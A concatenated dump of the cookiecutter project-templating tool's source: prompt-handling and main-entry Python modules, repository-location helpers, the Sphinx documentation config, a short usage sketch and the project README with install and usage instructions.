"1", "true", "t", "yes", "y", "on" - These input values will be converted to ``False``: "0", "false", "f", "no", "n", "off" Actual parsing done by :func:`prompt`; Check this function codebase change in case of unexpected behaviour. 
:param str question: Question to the user :param default_value: Value that will be returned if no input happens """ question = ( prompts[var_name] if prompts and var_name in prompts and prompts[var_name] else var_name ) return YesNoPrompt.ask(f"{prefix}{question}", default=default_value) def read_repo_password(question: str) -> str: """Prompt the user to enter a password. :param question: Question to the user """ return Prompt.ask(question, password=True) def read_user_choice(var_name: str, options: list, prompts=None, prefix: str = ""): """Prompt the user to choose from several options for the given variable. The first item will be returned if no input happens. :param var_name: Variable as specified in the context :param list options: Sequence of options that are available to select from :return: Exactly one item of ``options`` that has been chosen by the user """ if not options: raise ValueError choice_map = OrderedDict((f'{i}', value) for i, value in enumerate(options, 1)) choices = choice_map.keys() question = f"Select {var_name}" choice_lines: Iterator[str] = starmap( " [bold magenta]{}[/] - [bold]{}[/]".format, choice_map.items() ) # Handle if human-readable prompt is provided if prompts and var_name in prompts: if isinstance(prompts[var_name], str): question = prompts[var_name] else: if "__prompt__" in prompts[var_name]: question = prompts[var_name]["__prompt__"] choice_lines = ( f" [bold magenta]{i}[/] - [bold]{prompts[var_name][p]}[/]" if p in prompts[var_name] else f" [bold magenta]{i}[/] - [bold]{p}[/]" for i, p in choice_map.items() ) prompt = '\n'.join( ( f"{prefix}{question}", "\n".join(choice_lines), " Choose from", ) ) user_choice = Prompt.ask(prompt, choices=list(choices), default=next(iter(choices))) return choice_map[user_choice] DEFAULT_DISPLAY = 'default' def process_json(user_value: str): """Load user-supplied value as a JSON dict. :param user_value: User-supplied value to load as a JSON dict """ try: user_dict = json.loads(user_value, object_pairs_hook=OrderedDict) except Exception as error: # Leave it up to click to ask the user again msg = 'Unable to decode to JSON.' raise InvalidResponse(msg) from error if not isinstance(user_dict, dict): # Leave it up to click to ask the user again msg = 'Requires JSON dict.' raise InvalidResponse(msg) return user_dict class JsonPrompt(PromptBase[dict]): """A prompt that returns a dict from JSON string.""" default = None response_type = dict validate_error_message = "[prompt.invalid] Please enter a valid JSON string" @staticmethod def process_response(value: str) -> dict[str, Any]: """Convert choices to a dict.""" return process_json(value) def read_user_dict(var_name: str, default_value, prompts=None, prefix: str = ""): """Prompt the user to provide a dictionary of data. :param var_name: Variable as specified in the context :param default_value: Value that will be returned if no input is provided :return: A Python dictionary to use in the context. """ if not isinstance(default_value, dict): raise TypeError question = ( prompts[var_name] if prompts and var_name in prompts and prompts[var_name] else var_name ) return JsonPrompt.ask( f"{prefix}{question} [cyan bold]({DEFAULT_DISPLAY})[/]", default=default_value, show_default=False, ) _Raw: TypeAlias = Union[bool, Dict["_Raw", "_Raw"], List["_Raw"], str, None] def render_variable( env: Environment, raw: _Raw, cookiecutter_dict: dict[str, Any], ) -> str: """Render the next variable to be displayed in the user prompt. 
Inside the prompting taken from the cookiecutter.json file, this renders the next variable. For example, if a project_name is "Peanut Butter Cookie", the repo_name could be be rendered with: `{{ cookiecutter.project_name.replace(" ", "_") }}`. This is then presented to the user as the default. :param Environment env: A Jinja2 Environment object. :param raw: The next value to be prompted for by the user. :param dict cookiecutter_dict: The current context as it's gradually being populated with variables. :return: The rendered value for the default variable. """ if raw is None or isinstance(raw, bool): return raw if isinstance(raw, dict): return { render_variable(env, k, cookiecutter_dict): render_variable( env, v, cookiecutter_dict ) for k, v in raw.items() } if isinstance(raw, list): return [render_variable(env, v, cookiecutter_dict) for v in raw] if not isinstance(raw, str): raw = str(raw) template = env.from_string(raw) return template.render(cookiecutter=cookiecutter_dict) def _prompts_from_options(options: dict) -> dict: """Process template options and return friendly prompt information.""" prompts = {"__prompt__": "Select a template"} for option_key, option_value in options.items(): title = str(option_value.get("title", option_key)) description = option_value.get("description", option_key) label = title if title == description else f"{title} ({description})" prompts[option_key] = label return prompts def prompt_choice_for_template( key: str, options: dict, no_input: bool ) -> OrderedDict[str, Any]: """Prompt user with a set of options to choose from. :param no_input: Do not prompt for user input and return the first available option. """ opts = list(options.keys()) prompts = {"templates": _prompts_from_options(options)} return opts[0] if no_input else read_user_choice(key, opts, prompts, "") def prompt_choice_for_config( cookiecutter_dict: dict[str, Any], env: Environment, key: str, options, no_input: bool, prompts=None, prefix: str = "", ) -> OrderedDict[str, Any] | str: """Prompt user with a set of options to choose from. :param no_input: Do not prompt for user input and return the first available option. """ rendered_options = [render_variable(env, raw, cookiecutter_dict) for raw in options] if no_input: return rendered_options[0] return read_user_choice(key, rendered_options, prompts, prefix) def prompt_for_config( context: dict[str, Any], no_input: bool = False ) -> OrderedDict[str, Any]: """Prompt user to enter a new config. :param dict context: Source for field names and sample values. :param no_input: Do not prompt for user input and use only values from context. """ cookiecutter_dict = OrderedDict([]) env = create_env_with_context(context) prompts = context['cookiecutter'].pop('__prompts__', {}) # First pass: Handle simple and raw variables, plus choices. # These must be done first because the dictionaries keys and # values might refer to them. 
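    # Illustrative example (variable names are hypothetical, not taken from this
    # repo): a later dict variable such as
    #   "ci": {"provider": "{{ cookiecutter.project_slug }}"}
    # can only be rendered correctly after project_slug has been collected in
    # this first pass.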
count = 0 all_prompts = context['cookiecutter'].items() visible_prompts = [k for k, _ in all_prompts if not k.startswith("_")] size = len(visible_prompts) for key, raw in all_prompts: if key.startswith('_') and not key.startswith('__'): cookiecutter_dict[key] = raw continue if key.startswith('__'): cookiecutter_dict[key] = render_variable(env, raw, cookiecutter_dict) continue if not isinstance(raw, dict): count += 1 prefix = f" [dim][{count}/{size}][/] " try: if isinstance(raw, list): # We are dealing with a choice variable val = prompt_choice_for_config( cookiecutter_dict, env, key, raw, no_input, prompts, prefix ) cookiecutter_dict[key] = val elif isinstance(raw, bool): # We are dealing with a boolean variable if no_input: cookiecutter_dict[key] = render_variable( env, raw, cookiecutter_dict ) else: cookiecutter_dict[key] = read_user_yes_no(key, raw, prompts, prefix) elif not isinstance(raw, dict): # We are dealing with a regular variable val = render_variable(env, raw, cookiecutter_dict) if not no_input: val = read_user_variable(key, val, prompts, prefix) cookiecutter_dict[key] = val except UndefinedError as err: msg = f"Unable to render variable '{key}'" raise UndefinedVariableInTemplate(msg, err, context) from err # Second pass; handle the dictionaries. for key, raw in context['cookiecutter'].items(): # Skip private type dicts not to be rendered. if key.startswith('_') and not key.startswith('__'): continue try: if isinstance(raw, dict): # We are dealing with a dict variable count += 1 prefix = f" [dim][{count}/{size}][/] " val = render_variable(env, raw, cookiecutter_dict) if not no_input and not key.startswith('__'): val = read_user_dict(key, val, prompts, prefix) cookiecutter_dict[key] = val except UndefinedError as err: msg = f"Unable to render variable '{key}'" raise UndefinedVariableInTemplate(msg, err, context) from err return cookiecutter_dict def choose_nested_template( context: dict[str, Any], repo_dir: Path | str, no_input: bool = False ) -> str: """Prompt user to select the nested template to use. :param context: Source for field names and sample values. :param repo_dir: Repository directory. :param no_input: Do not prompt for user input and use only values from context. :returns: Path to the selected template. """ cookiecutter_dict: OrderedDict[str, Any] = OrderedDict([]) env = create_env_with_context(context) prefix = "" prompts = context['cookiecutter'].pop('__prompts__', {}) key = "templates" config = context['cookiecutter'].get(key, {}) if config: # Pass val = prompt_choice_for_template(key, config, no_input) template = config[val]["path"] else: # Old style key = "template" config = context['cookiecutter'].get(key, []) val = prompt_choice_for_config( cookiecutter_dict, env, key, config, no_input, prompts, prefix ) template = re.search(r'\((.+)\)', val).group(1) template = Path(template) if template else None if not (template and not template.is_absolute()): msg = "Illegal template path" raise ValueError(msg) repo_dir = Path(repo_dir).resolve() template_path = (repo_dir / template).resolve() # Return path as string return f"{template_path}" def prompt_and_delete(path: Path | str, no_input: bool = False) -> bool: """ Ask user if it's okay to delete the previously-downloaded file/directory. If yes, delete it. If no, checks to see if the old version should be reused. If yes, it's reused; otherwise, Cookiecutter exits. :param path: Previously downloaded zipfile. :param no_input: Suppress prompt to delete repo and just delete it. 
:return: True if the content was deleted """ # Suppress prompt if called via API if no_input: ok_to_delete = True else: question = ( f"You've downloaded {path} before. Is it okay to delete and re-download it?" ) ok_to_delete = read_user_yes_no(question, 'yes') if ok_to_delete: if os.path.isdir(path): rmtree(path) else: os.remove(path) return True ok_to_reuse = read_user_yes_no("Do you want to re-use the existing version?", 'yes') if ok_to_reuse: return False sys.exit() File: cookiecutter/main.py """ Main entry point for the `cookiecutter` command. The code in this module is also a good example of how to use Cookiecutter as a library rather than a script. """ from __future__ import annotations import logging import os import sys from copy import copy from pathlib import Path from typing import Any from cookiecutter.config import get_user_config from cookiecutter.exceptions import InvalidModeException from cookiecutter.generate import generate_context, generate_files from cookiecutter.hooks import run_pre_prompt_hook from cookiecutter.prompt import choose_nested_template, prompt_for_config from cookiecutter.replay import dump, load from cookiecutter.repository import determine_repo_dir from cookiecutter.utils import rmtree logger = logging.getLogger(__name__) def cookiecutter( template: str, checkout: str | None = None, no_input: bool = False, extra_context: dict[str, Any] | None = None, replay: bool | str | None = None, overwrite_if_exists: bool = False, output_dir: str = '.', config_file: str | None = None, default_config: bool = False, password: str | None = None, directory: str | None = None, skip_if_file_exists: bool = False, accept_hooks: bool = True, keep_project_on_failure: bool = False, ) -> str: """ Run Cookiecutter just as if using it from the command line. :param template: A directory containing a project template directory, or a URL to a git repository. :param checkout: The branch, tag or commit ID to checkout after clone. :param no_input: Do not prompt for user input. Use default values for template parameters taken from `cookiecutter.json`, user config and `extra_dict`. Force a refresh of cached resources. :param extra_context: A dictionary of context that overrides default and user configuration. :param replay: Do not prompt for input, instead read from saved json. If ``True`` read from the ``replay_dir``. if it exists :param overwrite_if_exists: Overwrite the contents of the output directory if it exists. :param output_dir: Where to output the generated project dir into. :param config_file: User configuration file path. :param default_config: Use default values rather than a config file. :param password: The password to use when extracting the repository. :param directory: Relative path to a cookiecutter template in a repository. :param skip_if_file_exists: Skip the files in the corresponding directories if they already exist. :param accept_hooks: Accept pre and post hooks if set to `True`. :param keep_project_on_failure: If `True` keep generated project directory even when generation fails """ if replay and ((no_input is not False) or (extra_context is not None)): err_msg = ( "You can not use both replay and no_input or extra_context " "at the same time." 
) raise InvalidModeException(err_msg) config_dict = get_user_config( config_file=config_file, default_config=default_config, ) base_repo_dir, cleanup_base_repo_dir = determine_repo_dir( template=template, abbreviations=config_dict['abbreviations'], clone_to_dir=config_dict['cookiecutters_dir'], checkout=checkout, no_input=no_input, password=password, directory=directory, ) repo_dir, cleanup = base_repo_dir, cleanup_base_repo_dir # Run pre_prompt hook repo_dir = str(run_pre_prompt_hook(base_repo_dir)) if accept_hooks else repo_dir # Always remove temporary dir if it was created cleanup = repo_dir != base_repo_dir import_patch = _patch_import_path_for_repo(repo_dir) template_name = os.path.basename(os.path.abspath(repo_dir)) if replay: with import_patch: if isinstance(replay, bool): context_from_replayfile = load(config_dict['replay_dir'], template_name) else: path, template_name = os.path.split(os.path.splitext(replay)[0]) context_from_replayfile = load(path, template_name) context_file = os.path.join(repo_dir, 'cookiecutter.json') logger.debug('context_file is %s', context_file) if replay: context = generate_context( context_file=context_file, default_context=config_dict['default_context'], extra_context=None, ) logger.debug('replayfile context: %s', context_from_replayfile) items_for_prompting = { k: v for k, v in context['cookiecutter'].items() if k not in context_from_replayfile['cookiecutter'] } context_for_prompting = {} context_for_prompting['cookiecutter'] = items_for_prompting context = context_from_replayfile logger.debug('prompting context: %s', context_for_prompting) else: context = generate_context( context_file=context_file, default_context=config_dict['default_context'], extra_context=extra_context, ) context_for_prompting = context # preserve the original cookiecutter options # print(context['cookiecutter']) context['_cookiecutter'] = { k: v for k, v in context['cookiecutter'].items() if not k.startswith("_") } # prompt the user to manually configure at the command line. # except when 'no-input' flag is set with import_patch: if {"template", "templates"} & set(context["cookiecutter"].keys()): nested_template = choose_nested_template(context, repo_dir, no_input) return cookiecutter( template=nested_template, checkout=checkout, no_input=no_input, extra_context=extra_context, replay=replay, overwrite_if_exists=overwrite_if_exists, output_dir=output_dir, config_file=config_file, default_config=default_config, password=password, directory=directory, skip_if_file_exists=skip_if_file_exists, accept_hooks=accept_hooks, keep_project_on_failure=keep_project_on_failure, ) if context_for_prompting['cookiecutter']: context['cookiecutter'].update( prompt_for_config(context_for_prompting, no_input) ) logger.debug('context is %s', context) # include template dir or url in the context dict context['cookiecutter']['_template'] = template # include output+dir in the context dict context['cookiecutter']['_output_dir'] = os.path.abspath(output_dir) # include repo dir or url in the context dict context['cookiecutter']['_repo_dir'] = f"{repo_dir}" # include checkout details in the context dict context['cookiecutter']['_checkout'] = checkout dump(config_dict['replay_dir'], template_name, context) # Create project from local context and project template. 
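    # generate_files() renders every path and file in the template tree with
    # this context; when accept_hooks is True the pre/post generate hooks run
    # around it, and keep_project_on_failure controls whether a partially
    # generated project is kept if rendering fails.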
with import_patch: result = generate_files( repo_dir=repo_dir, context=context, overwrite_if_exists=overwrite_if_exists, skip_if_file_exists=skip_if_file_exists, output_dir=output_dir, accept_hooks=accept_hooks, keep_project_on_failure=keep_project_on_failure, ) # Cleanup (if required) if cleanup: rmtree(repo_dir) if cleanup_base_repo_dir: rmtree(base_repo_dir) return result class _patch_import_path_for_repo: # noqa: N801 def __init__(self, repo_dir: Path | str) -> None: self._repo_dir = f"{repo_dir}" if isinstance(repo_dir, Path) else repo_dir def __enter__(self) -> None: self._path = copy(sys.path) sys.path.append(self._repo_dir) def __exit__(self, _type, _value, _traceback): # type: ignore[no-untyped-def] sys.path = self._path File: cookiecutter/repository.py """Cookiecutter repository functions.""" from __future__ import annotations import os import re from typing import TYPE_CHECKING from cookiecutter.exceptions import RepositoryNotFound from cookiecutter.vcs import clone from cookiecutter.zipfile import unzip if TYPE_CHECKING: from pathlib import Path REPO_REGEX = re.compile( r""" # something like git:// ssh:// file:// etc. ((((git|hg)\+)?(git|ssh|file|https?):(//)?) | # or (\w+@[\w\.]+) # something like user@... ) """, re.VERBOSE, ) def is_repo_url(value: str) -> bool: """Return True if value is a repository URL.""" return bool(REPO_REGEX.match(value)) def is_zip_file(value: str) -> bool: """Return True if value is a zip file.""" return value.lower().endswith('.zip') def expand_abbreviations(template: str, abbreviations: dict[str, str]) -> str: """Expand abbreviations in a template name. :param template: The project template name. :param abbreviations: Abbreviation definitions. """ if template in abbreviations: return abbreviations[template] # Split on colon. If there is no colon, rest will be empty # and prefix will be the whole template prefix, _sep, rest = template.partition(':') if prefix in abbreviations: return abbreviations[prefix].format(rest) return template def repository_has_cookiecutter_json(repo_directory: str) -> bool: """Determine if `repo_directory` contains a `cookiecutter.json` file. :param repo_directory: The candidate repository directory. :return: True if the `repo_directory` is valid, else False. """ repo_directory_exists = os.path.isdir(repo_directory) repo_config_exists = os.path.isfile( os.path.join(repo_directory, 'cookiecutter.json') ) return repo_directory_exists and repo_config_exists def determine_repo_dir( template: str, abbreviations: dict[str, str], clone_to_dir: Path | str, checkout: str | None, no_input: bool, password: str | None = None, directory: str | None = None, ) -> tuple[str, bool]: """ Locate the repository directory from a template reference. Applies repository abbreviations to the template reference. If the template refers to a repository URL, clone it. If the template is a path to a local repository, use it. :param template: A directory containing a project template directory, or a URL to a git repository. :param abbreviations: A dictionary of repository abbreviation definitions. :param clone_to_dir: The directory to clone the repository into. :param checkout: The branch, tag or commit ID to checkout after clone. :param no_input: Do not prompt for user input and eventually force a refresh of cached resources. :param password: The password to use when extracting the repository. :param directory: Directory within repo where cookiecutter.json lives. 
:return: A tuple containing the cookiecutter template directory, and a boolean describing whether that directory should be cleaned up after the template has been instantiated. :raises: `RepositoryNotFound` if a repository directory could not be found. """ template = expand_abbreviations(template, abbreviations) if is_zip_file(template): unzipped_dir = unzip( zip_uri=template, is_url=is_repo_url(template), clone_to_dir=clone_to_dir, no_input=no_input, password=password, ) repository_candidates = [unzipped_dir] cleanup = True elif is_repo_url(template): cloned_repo = clone( repo_url=template, checkout=checkout, clone_to_dir=clone_to_dir, no_input=no_input, ) repository_candidates = [cloned_repo] cleanup = False else: repository_candidates = [template, os.path.join(clone_to_dir, template)] cleanup = False if directory: repository_candidates = [ os.path.join(s, directory) for s in repository_candidates ] for repo_candidate in repository_candidates: if repository_has_cookiecutter_json(repo_candidate): return repo_candidate, cleanup msg = ( 'A valid repository for "{}" could not be found in the following ' 'locations:\n{}'.format(template, '\n'.join(repository_candidates)) ) raise RepositoryNotFound(msg) File: cookiecutter/__main__.py """Allow cookiecutter to be executable through `python -m cookiecutter`.""" from cookiecutter.cli import main if __name__ == "__main__": main(prog_name="cookiecutter") File: docs/conf.py """Documentation build configuration file.""" # # cookiecutter documentation build configuration file, created by # sphinx-quickstart on Thu Jul 11 11:31:49 2013. # # This file is execfile()d with the current directory set to its containing # dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import os import sys # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # sys.path.insert(0, os.path.abspath('.')) # For building docs in foreign environments where we don't have all our # dependencies (like readthedocs), mock out imports that cause sphinx to fail. # see: https://docs.readthedocs.io/en/latest/faq.html#i-get-import-errors-on-libraries-that-depend-on-c-modules # Add parent dir to path cwd = os.getcwd() parent = os.path.dirname(cwd) sys.path.append(parent) import cookiecutter # noqa: E402 # -- General configuration ---------------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. # needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or # your custom ones. extensions = [ 'sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.coverage', 'sphinx.ext.imgmath', 'sphinx.ext.ifconfig', 'sphinx.ext.viewcode', 'sphinx_click.ext', 'myst_parser', 'sphinxcontrib.apidoc', 'sphinx_autodoc_typehints', ] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = {'.rst': 'restructuredtext', '.md': 'markdown'} # The encoding of source files. # source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. 
project = 'cookiecutter' copyright = '2013-2022, Audrey Roy and Cookiecutter community' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = cookiecutter.__version__ # The full version, including alpha/beta/rc tags. release = cookiecutter.__version__ # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: # today = '' # Else, today_fmt is used as the format for a strftime call. # today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = ['_build'] # The reST default role (used for this markup: `text`) to use for all documents # default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. # add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). # add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. # show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. # modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built documents. # keep_warnings = False # Suppress nonlocal image warnings suppress_warnings = ['image.nonlocal_uri'] # -- Options for HTML output -------------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = 'sphinx_rtd_theme' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. # html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. # html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". # html_title = None # A shorter title for the navigation bar. Default is the same as html_title. # html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. # html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. # html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = [] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. # html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. # html_use_smartypants = True # Custom sidebar templates, maps document names to template names. # html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. 
# html_additional_pages = {} # If false, no module index is generated. # html_domain_indices = True # If false, no index is generated. # html_use_index = True # If true, the index is split into individual pages for each letter. # html_split_index = False # If true, links to the reST sources are added to the pages. # html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. # html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. # html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. # html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). # html_file_suffix = None # Output file base name for HTML help builder. htmlhelp_basename = 'cookiecutterdoc' # -- Options for LaTeX output ------------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). # 'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). # 'pointsize': '10pt', # Additional stuff for the LaTeX preamble. # 'preamble': '', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, author, documentclass [howto/manual]) latex_documents = [ ( 'index', 'cookiecutter.tex', 'cookiecutter Documentation', 'Audrey Roy and Cookiecutter community', 'manual', ), ] # The name of an image file (relative to this directory) to place at the top of # the title page. # latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. # latex_use_parts = False # If true, show page references after internal links. # latex_show_pagerefs = False # If true, show URL addresses after external links. # latex_show_urls = False # Documents to append as an appendix to all manuals. # latex_appendices = [] # If false, no module index is generated. # latex_domain_indices = True # -- Options for manual page output ------------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ ( 'index', 'cookiecutter', 'cookiecutter Documentation', ['Audrey Roy and Cookiecutter community'], 1, ) ] # If true, show URL addresses after external links. # man_show_urls = False # -- Options for Texinfo output ----------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ ( 'index', 'cookiecutter', 'cookiecutter Documentation', 'Audrey Roy and Cookiecutter community', 'cookiecutter', 'Creates projects from project templates', 'Miscellaneous', ), ] # Documents to append as an appendix to all manuals. # texinfo_appendices = [] # If false, no module index is generated. # texinfo_domain_indices = True # How to display URL addresses: 'footnote', 'no', or 'inline'. # texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. # texinfo_no_detailmenu = False # -- Options for Epub output -------------------------------------------------- # Bibliographic Dublin Core info. 
epub_title = 'cookiecutter' epub_author = 'Audrey Roy' epub_publisher = 'Audrey Roy and Cookiecutter community' epub_copyright = '2013-2022, Audrey Roy and Cookiecutter community' # The language of the text. It defaults to the language option # or en if the language is not set. # epub_language = '' # The scheme of the identifier. Typical schemes are ISBN or URL. # epub_scheme = '' # The unique identifier of the text. This can be a ISBN number # or the project homepage. # epub_identifier = '' # A unique identification for the text. # epub_uid = '' # A tuple containing the cover image and cover page html template filenames. # epub_cover = () # A sequence of (type, uri, title) tuples for the guide element of content.opf. # epub_guide = () # HTML files that should be inserted before the pages created by sphinx. # The format is a list of tuples containing the path and title. # epub_pre_files = [] # HTML files that should be inserted after the pages created by sphinx. # The format is a list of tuples containing the path and title. # epub_post_files = [] # A list of files that should not be packed into the epub file. # epub_exclude_files = [] # The depth of the table of contents in toc.ncx. # epub_tocdepth = 3 # Allow duplicate toc entries. # epub_tocdup = True # Fix unsupported image types using the PIL. # epub_fix_images = False # Scale large images. # epub_max_image_width = 0 # If 'no', URL addresses will not be shown. # epub_show_urls = 'inline' # If false, no index is generated. # epub_use_index = True # Example configuration for intersphinx: refer to the Python standard library. intersphinx_mapping = { "python": ("https://docs.python.org/3", None), "requests": ("https://requests.readthedocs.io/en/latest/", None), "click": ("https://click.palletsprojects.com/en/latest", None), } myst_enable_extensions = [ "tasklist", "strikethrough", "fieldlist", ] myst_heading_anchors = 3 # Apidoc extension config apidoc_module_dir = "../cookiecutter" apidoc_output_dir = "." apidoc_toc_file = False apidoc_extra_args = ["-t", "_templates"] autodoc_member_order = "groupwise" autodoc_typehints = "none" File: docs/__init__.py """Main package for docs."""
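# Illustrative usage sketch (not a file from the repository): with
# no_input=True, prompt_for_config() from cookiecutter/prompt.py renders each
# default through the Jinja2 environment built by create_env_with_context()
# and returns the values without prompting. The variable names below are
# made up for the example.
from collections import OrderedDict

from cookiecutter.prompt import prompt_for_config

context = {
    "cookiecutter": OrderedDict(
        [
            ("project_name", "My Project"),
            ("repo_name", "{{ cookiecutter.project_name|lower|replace(' ', '-') }}"),
        ]
    )
}

result = prompt_for_config(context, no_input=True)
# result["repo_name"] is rendered from the already-collected project_name,
# yielding "my-project".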
<h1 align="center"> <img alt="cookiecutter Logo" width="200px" src="https://raw.githubusercontent.com/cookiecutter/cookiecutter/3ac078356adf5a1a72042dfe72ebfa4a9cd5ef38/logo/cookiecutter_medium.png"> </h1> <div align="center"> [![pypi](https://img.shields.io/pypi/v/cookiecutter.svg)](https://pypi.org/project/cookiecutter/) [![python](https://img.shields.io/pypi/pyversions/cookiecutter.svg)](https://pypi.org/project/cookiecutter/) [![Build Status](https://github.com/cookiecutter/cookiecutter/actions/workflows/tests.yml/badge.svg?branch=main)](https://github.com/cookiecutter/cookiecutter/actions) [![codecov](https://codecov.io/gh/cookiecutter/cookiecutter/branch/main/graphs/badge.svg?branch=main)](https://codecov.io/github/cookiecutter/cookiecutter?branch=main) [![discord](https://img.shields.io/badge/Discord-cookiecutter-5865F2?style=flat&logo=discord&logoColor=white)](https://discord.gg/9BrxzPKuEW) [![docs](https://readthedocs.org/projects/cookiecutter/badge/?version=latest)](https://readthedocs.org/projects/cookiecutter/?badge=latest) [![Code Quality](https://img.shields.io/scrutinizer/g/cookiecutter/cookiecutter.svg)](https://scrutinizer-ci.com/g/cookiecutter/cookiecutter/?branch=main) </div> # Cookiecutter Create projects swiftly from **cookiecutters** (project templates) with this command-line utility. Ideal for generating Python package projects and more. - [Documentation](https://cookiecutter.readthedocs.io) - [GitHub](https://github.com/cookiecutter/cookiecutter) - [PyPI](https://pypi.org/project/cookiecutter/) - [License (BSD)](https://github.com/cookiecutter/cookiecutter/blob/main/LICENSE) ## Installation Install cookiecutter using pip package manager: ``` # pipx is strongly recommended. pipx install cookiecutter # If pipx is not an option, # you can install cookiecutter in your Python user directory. python -m pip install --user cookiecutter ``` ## Features - **Cross-Platform:** Supports Windows, Mac, and Linux. - **User-Friendly:** No Python knowledge required. - **Versatile:** Compatible with Python 3.7 to 3.12. - **Multi-Language Support:** Use templates in any language or markup format. ### For Users #### Quick Start The recommended way to use Cookiecutter as a command line utility is to run it with [`pipx`](https://pypa.github.io/pipx/), which can be installed with `pip install pipx`, but if you plan to use Cookiecutter programmatically, please run `pip install cookiecutter`. **Use a GitHub template** ```bash # You'll be prompted to enter values. # Then it'll create your Python package in the current working directory, # based on those values. # For the sake of brevity, repos on GitHub can just use the 'gh' prefix $ pipx run cookiecutter gh:audreyfeldroy/cookiecutter-pypackage ``` **Use a local template** ```bash $ pipx run cookiecutter cookiecutter-pypackage/ ``` **Use it from Python** ```py from cookiecutter.main import cookiecutter # Create project from the cookiecutter-pypackage/ template cookiecutter('cookiecutter-pypackage/') # Create project from the cookiecutter-pypackage.git repo template cookiecutter('gh:audreyfeldroy//cookiecutter-pypackage.git') ``` #### Detailed Usage - Generate projects from local or remote templates. - Customize projects with `cookiecutter.json` prompts. - Utilize pre-prompt, pre- and post-generate hooks. [Learn More](https://cookiecutter.readthedocs.io/en/latest/usage.html) ### For Template Creators - Utilize unlimited directory nesting. - Employ Jinja2 for all templating needs. - Define template variables easily with `cookiecutter.json`. 
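A quick sketch of how those `cookiecutter.json` variables can also be pre-filled when calling Cookiecutter from Python (the template path and variable name here are only illustrative):

```py
from cookiecutter.main import cookiecutter

# Skip the interactive prompts and override a template variable directly.
cookiecutter(
    'cookiecutter-pypackage/',
    no_input=True,
    extra_context={'project_name': 'My Project'},
)
```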
[Learn More](https://cookiecutter.readthedocs.io/en/latest/tutorials/) ## Available Templates Discover a variety of ready-to-use templates on [GitHub](https://github.com/search?q=cookiecutter&type=Repositories). ### Special Templates - [cookiecutter-pypackage](https://github.com/audreyfeldroy/cookiecutter-pypackage) - [cookiecutter-django](https://github.com/pydanny/cookiecutter-django) - [cookiecutter-pytest-plugin](https://github.com/pytest-dev/cookiecutter-pytest-plugin) - [cookiecutter-plone-starter](https://github.com/collective/cookiecutter-plone-starter) ## Community Join the community, contribute, or seek assistance. - [Troubleshooting Guide](https://cookiecutter.readthedocs.io/en/latest/troubleshooting.html) - [Stack Overflow](https://stackoverflow.com/questions/tagged/cookiecutter) - [Discord](https://discord.gg/9BrxzPKuEW) - [File an Issue](https://github.com/cookiecutter/cookiecutter/issues?q=is%3Aopen) - [Contributors](AUTHORS.md) - [Contribution Guide](CONTRIBUTING.md) ### Support - Star us on [GitHub](https://github.com/cookiecutter/cookiecutter). - Stay tuned for upcoming support options. ### Feedback We value your feedback. Share your criticisms or complaints constructively to help us improve. - [File an Issue](https://github.com/cookiecutter/cookiecutter/issues?q=is%3Aopen) ### Waiting for a Response? - Be patient and consider reaching out to the community for assistance. - For urgent matters, contact [@audreyfeldroy](https://github.com/audreyfeldroy) for consultation or custom development. ## Code of Conduct Adhere to the [PyPA Code of Conduct](https://www.pypa.io/en/latest/code-of-conduct/) during all interactions in the project's ecosystem. ## Acknowledgements Created and led by [Audrey Roy Greenfeld](https://github.com/audreyfeldroy), supported by a dedicated team of maintainers and contributors.
marker
